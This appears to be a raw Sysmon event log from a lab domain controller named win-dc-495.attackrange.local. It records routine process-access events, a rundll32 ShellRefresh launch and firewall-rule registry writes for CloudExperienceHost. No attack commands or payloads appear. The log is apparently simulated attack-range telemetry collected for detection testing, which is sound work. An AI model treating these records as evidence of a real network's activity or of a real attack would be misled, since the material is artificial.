13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.289{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.289{59A5CD1D-93FB-6005-FE04-00000000A301}51082300C:\Windows\system32\svchost.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+21b54|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+2a21d|c:\windows\system32\appxdeploymentserver.dll+157ebf|c:\windows\system32\appxdeploymentserver.dll+ae504|c:\windows\system32\appxdeploymentserver.dll+92924|c:\windows\system32\appxdeploymentserver.dll+19e0c|c:\windows\system32\appxdeploymentserver.dll+2bffd|c:\windows\system32\appxdeploymentserver.dll+2bdf9|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.292{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe 
AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 13241300x800000000000000010521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|B=C:\Windows\system32\wwahost.exe|M=microsoft.windows.cloudexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9AD33F43-BA68-46BA-B70D-4281E9ED227C}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{E10A9EBF-1EBD-4015-B448-24B4DAB8DBC1}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{16EED538-872F-4095-A476-E0935BDCD55A}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{22D25978-1F54-43FA-9308-9F5DC73F4341}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x800000000000000010516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{31633854-80F2-42A2-A914-3212D971AD69}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x800000000000000010515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A63EDDD3-1CC2-49BF-A9CD-1BE8C596C4A7}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0795F422-C17F-4A1F-9A3F-3DB3A506F619}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B50E02F0-DC39-4A5A-8B38-27C6129676EE}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x800000000000000010512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.274{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D8C35944-E495-45B3-AB42-022BFDCE5B56}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 
10341000x800000000000000010511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.227{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 